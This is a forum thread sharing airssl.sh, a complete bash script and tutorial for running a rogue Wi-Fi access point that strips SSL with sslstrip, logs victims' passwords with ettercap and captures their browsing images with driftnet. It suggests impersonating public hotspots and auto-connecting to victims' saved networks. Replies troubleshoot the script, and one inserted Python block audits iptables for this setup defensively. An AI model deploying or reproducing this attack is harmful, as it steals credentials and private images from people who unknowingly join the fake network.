
Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh


  1. #1
    killadaninja

    NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    airssl.sh creates a fake access point using Airbase-ng and uses sslstrip to bypass SSL encryption; it also offers the user the choice to use Driftnet to capture images.

    airssl.sh gives the user the option, on the fly, to configure Airbase-ng and Ettercap, giving the user the possibility to load filters etc. This script also takes into consideration less literate users, offering them the chance to use basic modes for everything.

    Upon execution airssl.sh creates a working directory at /pentest/wireless/airssl, it then creates a dhcpd.conf file to use along with all the other necessary files it needs to work.

    Tutorial.
    Installation and use of airssl.sh is very simple and is covered below.

    Requirements.
    Airssl requires you to have at least 1 WNIC (wireless network interface card) for broadcasting the fake AP, and another WNIC/NIC to be connected to the internet. For the sake of this tutorial, eth1 will be connected to the internet and I will use wlan0 to broadcast the fake AP. airssl.sh manually configures IP forwarding, so if you have removed the comments from etter.conf to enable this then please put them back, i.e. use a default etter.conf.

    Installing airssl

    1. Right click on your desktop and choose create new, now choose "text file" and finally name it airssl.sh
    2. Copy the script in the next post.
    3. Navigate back to your desktop, right click on the airssl.sh file you created and then choose open with, then select Kate.
    4. Now hit "ctrl v" to paste the code you copied in the next post, then hit "ctrl s" to save the file and finally "ctrl q" to quit Kate.
    5. Now open up a terminal and write
    Code:
    chmod 755  /root/airssl.sh
    (If airssl.sh is not in /root/ you probably do not need to be reading this tutorial.)

    6. Now open up a terminal and write
    Code:
    /root/airssl.sh
    You should see
    Code:
    AIRSSL 2.0 - Credits killadaninja & G60Jon
    If you do, then well done, the script has started.

    Using airssl
    The first question airssl will ask you is
    Code:
    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    Above this question airssl has already grepped your gateway's address and named your wireless device attached to it.

    Code:
    AIRSSL 2.0 - Credits killadaninja & G60Jon
    
    0.0.0.0         192.168.0.1     0.0.0.0         UG    0      0        0 eth1
    
    
    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    This clearly shows that in this circumstance eth1 is the device connected to a gateway address of 192.168.0.1.

    So I input 192.168.0.1 and hit enter; this brings airssl to its next question.

    Code:
    Enter your interface that is connected to the internet, this should be listed above. For example eth1:
    No problem, we know this from our information above, and in this circumstance it happens to be eth1.

    So we input eth1 and hit enter, and airssl asks us its next question.

    Code:
    Enter your interface to be used for the fake AP, for example wlan0:
    If you are unsure of the name of the dev you want to use for broadcasting the rogue AP then open a new console and input
    Code:
    airmon-ng
    For me this returns
    Code:
    Interface       Chipset         Driver
    
    eth1            Broadcom                wl
    wlan0           RTL8187         rtl8187 - [phy0]
    As airssl told us earlier, eth1 is the card connected to the gateway, thus the card we want to use for the rogue AP, in this circumstance, must be wlan0.

    So we input wlan0 and hit enter, which brings airssl to its next question.

    Code:
    Enter the ESSID you would like your rogue AP to be called
    What airssl is asking you here is, what do you want your Fake AP to be called, some good ideas might be McDonalds Hotspot, LA X Terminal 1, etc etc. (Note, spaces are allowed)

    For this tutorial we will input Freewifi and hit enter, which brings airssl to its next question.

    Code:
    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches?
    
    Choose Y to see airbase-ng help and add switches.
    Choose N to run airbase-ng in basic mode with your chosen ESSID.
    Choose A to run airbase-ng in respond to all probes mode (in this mode your chosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
    Y, N or A
    The above question is pretty self-explanatory; if you want to learn more about the -a switch or any of the switches, consult the airbase-ng FAQ.

    For the sake of this tutorial we will choose n, so we input n and continue.

    airssl will print a few lines and open a few xterm windows (so we can see what is happening with the attack); after a few seconds AIRSSL will ask its next question.
    Code:
    Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N
    Y or N
    Again in this tutorial we will choose N; loading Ettercap filters is beyond the depth of this tutorial, consult the Ettercap FAQ to learn more.

    After we input N and hit enter, we should see the next question.

    Code:
    Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower)
    Y or N
    Again for this tutorial we will choose n; however, even the less advanced users may choose y here, nothing complicated will happen, we will just see the victim's images as they browse, and these are also saved at /pentest/wireless/airssl/driftnetdata. Whatever you choose, the final screen you will see will look like this.
    Code:
    [+] Activated...
    Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftnetdata
    
    [+] IMPORTANT...
    After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR
    If all went well the attack is now running. Using a test computer you should be able to scan for networks and connect to your newly created FakeAP; whilst on the test PC, connect to a site you know uses SSL encryption and sign in, and you should see credentials displayed in ettercap's xterm shell in plain text. This attack will also filter passwords from unencrypted sites, try one. Passwords saved from Ettercap. Don't forget you can use your right mouse button to scroll up ettercap (in case you think you missed some credentials).

    Final Note
    As you can see you are still left with one last question: AIRSSL asks you to type Y to clean up properly after you have finished your session. I strongly suggest you take notice of this and do as asked. If you do not choose Y and let airssl close properly, your system may become dysfunctional. Another serious note: if airssl is not working, try getting to this step and choosing Y (to clean up), then try running airssl again; this can help because it may fix some forwarding or other dev creation errors.
    Last edited by killadaninja; 11-19-2010 at 09:00 AM.

  2. #2
    killadaninja

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    
    # Network questions
    echo
    echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
    echo
    route -n -A inet | grep UG
    echo
    echo
    echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
    read -e gatewayip
    echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read -e ESSID
    airmon-ng start $fakeap_interface
    fakeap=$fakeap_interface
    fakeap_interface="mon0"
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers 10.0.0.1;
    
    range 10.0.0.20 10.0.0.50;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches? "
    echo
    echo "Choose Y to see airbase-ng help and add switches. "
    echo "Choose N to run airbase-ng in basic mode with your chosen ESSID. "
    echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your chosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
    echo "Y, N or A "
     
    
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N "
    echo "Y or N "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redefined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), "
    echo "Y or N "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit
    Last edited by killadaninja; 11-19-2010 at 09:06 AM.
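    As an added example from the defender's side (not part of the thread or of airssl.sh), the following Python audits an iptables-save dump for the forwarding and NAT fingerprint the script above installs on a host: the port-80 REDIRECT to a local non-80 port (the sslstrip hook), the catch-all UDP DNAT that sends every DNS query to one address, MASQUERADE on the uplink and ip_forward=1. The dump and the ip_forward value are constructed sample input, and the function names are my own; on a real box you would feed it the output of `iptables-save` and the contents of /proc/sys/net/ipv4/ip_forward.

```python
"""Audit an iptables-save dump for a transparent HTTP-interception setup."""
import re

# Constructed sample: mirrors the rules airssl.sh installs (not a real capture).
SAMPLE_IPTABLES_SAVE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p udp -j DNAT --to-destination 192.168.0.1
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000
-A POSTROUTING -o eth1 -j MASQUERADE
COMMIT
*filter
:FORWARD ACCEPT [0:0]
-A FORWARD -i at0 -j ACCEPT
COMMIT
"""


def parse_rules(dump):
    """Yield (table, rule) for every '-A' line, tracking the current '*table'."""
    table = None
    for line in dump.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]
        elif line.startswith("-A "):
            yield table, line


def _opt(rule, flag):
    """Return the argument following `flag` in an iptables rule, or None."""
    m = re.search(r"(?:^|\s)%s\s+(\S+)" % re.escape(flag), rule)
    return m.group(1) if m else None


def audit_iptables(dump, ip_forward="0"):
    """Return finding strings; an empty list means no interception pattern."""
    suspicious, context = [], []
    for table, rule in parse_rules(dump):
        if table != "nat":
            continue
        target, proto, dport = _opt(rule, "-j"), _opt(rule, "-p"), _opt(rule, "--dport")
        # Port-80 REDIRECT to a local non-80 port: the classic sslstrip hook-up.
        if target == "REDIRECT" and proto == "tcp" and dport == "80":
            to_port = _opt(rule, "--to-ports")
            if to_port != "80":
                suspicious.append("http_redirect_to_port_%s" % to_port)
        # DNAT of all UDP with no -d / --dport match: every DNS query lands on one host.
        elif target == "DNAT" and proto == "udp" and dport is None and "-d " not in rule:
            suspicious.append("catchall_udp_dnat_%s" % _opt(rule, "--to-destination"))
        # MASQUERADE alone is ordinary NAT; report it only as context for a real hit.
        elif target == "MASQUERADE":
            context.append("masquerade_on_%s" % _opt(rule, "-o"))
    if not suspicious:
        return []
    if ip_forward.strip() == "1":
        context.append("ip_forward_enabled")
    return suspicious + context


if __name__ == "__main__":
    for finding in audit_iptables(SAMPLE_IPTABLES_SAVE, ip_forward="1"):
        print(finding)
```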

  3. #3
    kenv202

    great post, thank you for sharing =)

    P.S.: is it possible to make ettercap output a better result table? For example I capture my own Yahoo login, but the log files are saved in coded format. =/
    Last edited by kenv202; 05-10-2010 at 06:37 PM.

  4. #4
    killadaninja

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    You would need to use Wireshark or something of the like to open them, perhaps I will make a good filter for Wireshark to filter credentials.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  5. #5
    eeveeayen

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I am running this script using eth0 as my internet-facing NIC (hardwired to my router but obtaining an IP using DHCP) and wlan0 as the FakeAP NIC. I can see the SSID from another computer but when I try to connect to it, it does not obtain an IP Address. I can see the DHCPDISCOVER come in and the subsequent DHCPOFFER of 10.0.0.20 but the client never accepts this address. The request will time out and I will see another DHCPDISCOVER and DHCPOFFER. Perhaps you can offer some insight as to why this is happening. Is it conflicting with the DHCP used between eth0 and my home router?

    I ran Wireshark on both machines. Both machines see the DHCPDISCOVER but only the server machine sees the DHCPOFFER.
    Last edited by eeveeayen; 05-15-2010 at 03:02 AM.

  6. #6
    409an5

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Nice Info. Thanks. I am going to try this out.

  7. #7
    Junior Member

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by killadaninja View Post
    You would need to use Wireshark or something of the like to open them, perhaps I will make a good filter for Wireshark to filter credentials.
    Thank you, will look forward to this..

  8. #8
    Just burned his ISO

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hi, nice script, however I had to add two lines to get it to work for me (the last two lines are the new ones)

    Code:
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID

    airmon-ng start $fakeap_interface   # added line: put the card into monitor mode
    fakeap_interface="mon0"             # added line: use the mon0 device airmon-ng creates

    Might help someone else having trouble with it.

  9. #9
    Just burned his ISO

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    subscribing.

    great info thanks

  10. #10
    MikeCa

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I did a fair bit of experimenting with this script today and here are my experiences.

    If you are running module rtl8187 then you need to add the bit where you start airmon-ng and change fakeap_interface to mon0. This is because when wlan0 (the wifi device that creates the fake ap) goes into monitor mode it creates a new device called mon0. If you are running r8187 then this device is not created: wlan0 goes into monitor mode, no new devices are created.

    There is some outstanding issue with blank network names being created. On a macbook with a wifi dongle the network appeared with no name, but I was able to connect, get an IP address and everything worked. With my iPhone I can actually see the network named properly but I can not get an IP address. On a Windows XP machine the name is corrupted, usually it never shows up but sometimes the name appears as a series of boxes. If this happens then I can connect and get an IP address. So there appears to be an issue with creating the fake AP. I wonder if it is related to the -y switch in airbase-ng. There seems to be some discussion around the Internet about this, I could not get it to make a difference though with a lot of experimenting.

    I am using the r8187 module, an Alfa for the fake AP, and eth0 for the Internet connection.
